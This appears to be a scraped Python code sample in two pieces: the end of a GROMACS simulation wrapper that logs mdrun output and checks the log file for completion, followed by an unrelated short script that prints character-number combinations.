# Report any stdout/stderr which are output from execution
if mdrun_out:
logger.info("STDOUT received from MDRUN execution")
for line in mdrun_out:
logger.info(line)
# Same reasoning as before for "grompp".
if mdrun_err and any(
["Error" in line.decode("utf-8").strip() for line in mdrun_err]
):
logger.info("STDERR received from MDRUN execution")
for line in mdrun_err:
logger.error(line)
# Check completion status
if (
self.control["integrator"]
in [
self.Optimizer.SteepestDescent.value,
self.Optimizer.ConjugateGradient.value,
self.Optimizer.Broyden.value,
]
and self.check_complete()
):
logger.info("Minimization completed...")
elif self.check_complete():
logger.info("Simulation completed...")
else:
logger.info(
"Simulation did not complete when executing the following ...."
)
logger.info(" ".join(mdrun_list))
if not fail_ok:
raise Exception(
"Exiting due to failed simulation! Check logging info."
)
else:
logger.info(
"Completed output detected ... Skipping. Use: run(overwrite=True) to overwrite"
)
def check_complete(self, alternate_file=None):
"""
Check for the string "step N" in ``self.output`` file. If "step N" is found, then
the simulation completed.
Parameters
----------
alternate_file : os.PathLike, optional, default=None
If present, check for "step N" in this file rather than ``self.output``.
Default: None
Returns
-------
complete : bool
True if "step N" is found in file. False, otherwise.
"""
# Assume not completed
complete = False
if alternate_file:
output_file = alternate_file
else:
output_file = os.path.join(self.path, self.logfile)
if os.path.isfile(output_file):
with open(output_file, "r") as f:
strings = f.read()
if (
f" step {self.control['nsteps']} " in strings
or "Finished mdrun" in strings
):
complete = True
if complete:
logger.debug("{} indicates the simulation is complete".format(output_file))
else:
logger.debug("{} does not indicate the simulation is complete".format(output_file))
return complete
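# ------------------------------------------------------------------
# A hedged usage sketch (not part of the original class): it assumes the
# class is named ``GROMACS``, as its docstrings suggest, and that the
# ``Simulation`` base class provides ``path``, ``executable``, ``topology``,
# ``coordinates``, ``n_threads`` and related attributes (not shown here).
#
#     md = GROMACS()
#     md.path = "./simulations/npt"        # hypothetical working directory
#     md.prefix = "npt"                    # yields npt.mdp, npt.tpr, npt.log
#     md.topology = "topology.top"         # placeholder file names
#     md.coordinates = "coordinates.gro"
#     md.config_pbc_md()                   # defaults: NPT, leap-frog, v-rescale
#     md.run()
# ------------------------------------------------------------------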
|
nilq/baby-python
|
python
|
# Read a character-code range [a1, a2) and a loop bound n from stdin.
a1 = int(input())
a2 = int(input())
n = int(input())

# ``ord(chr(a2 - 1)) + 1`` in the original is simply ``a2``, and the loop
# bounds ``(n - 1) + 1`` and ``int((n / 2) - 1) + 1`` reduce to ``n`` and
# ``n // 2``; behavior is unchanged.
for p in range(a1, a2):
    for i in range(1, n):
        for j in range(1, n // 2):
            # Print only when the code point p is odd and i + j + p is odd.
            if p % 2 != 0 and (i + j + p) % 2 != 0:
                print(f"{chr(p)}-{i}{j}{p}")
|
nilq/baby-python
|
python
|